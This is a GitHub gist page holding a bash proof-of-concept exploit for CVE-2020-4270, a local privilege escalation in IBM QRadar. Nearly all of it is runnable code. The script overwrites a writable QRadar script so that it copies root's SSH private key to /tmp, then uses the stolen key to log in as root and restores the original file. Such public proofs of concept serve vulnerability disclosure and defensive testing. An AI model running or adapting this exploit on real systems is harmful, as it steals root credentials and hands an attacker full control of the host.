Created
April 16, 2020 07:43
-
-
Save ykoster/877f7f8dfc0cb7d7fc697c09ffa51845 to your computer and use it in GitHub Desktop.
Local privilege escalation in QRadar due to run-result-reader.sh insecure file permissions (CVE-2020-4270) proof of concept
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| trap cleanup INT | |
| function cleanup() | |
| { | |
| if [ -f /tmp/run-result-reader.sh ] | |
| then | |
| /usr/bin/cat /tmp/run-result-reader.sh > /opt/qvm/iem/bin/run-result-reader.sh | |
| /usr/bin/rm -f /tmp/run-result-reader.sh | |
| fi | |
| if [ -f /tmp/id_rsa ] | |
| then | |
| /usr/bin/rm -f /tmp/id_rsa | |
| fi | |
| } | |
| if [ ! -f /tmp/run-result-reader.sh ] | |
| then | |
| /usr/bin/cp /opt/qvm/iem/bin/run-result-reader.sh /tmp/run-result-reader.sh | |
| /usr/bin/cat > /opt/qvm/iem/bin/run-result-reader.sh << __EOF__ | |
| #!/bin/sh | |
| /usr/bin/cp /root/.ssh/id_rsa /tmp/ | |
| /usr/bin/chown nobody.nobody /tmp/id_rsa | |
| __EOF__ | |
| fi | |
| echo "Please wait..." | |
| while [ 1 ] | |
| do | |
| if [ -f /tmp/id_rsa ] | |
| then | |
| /usr/bin/ssh -i /tmp/id_rsa root@localhost | |
| cleanup | |
| exit 0 | |
| fi | |
| /usr/bin/sleep 60 | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment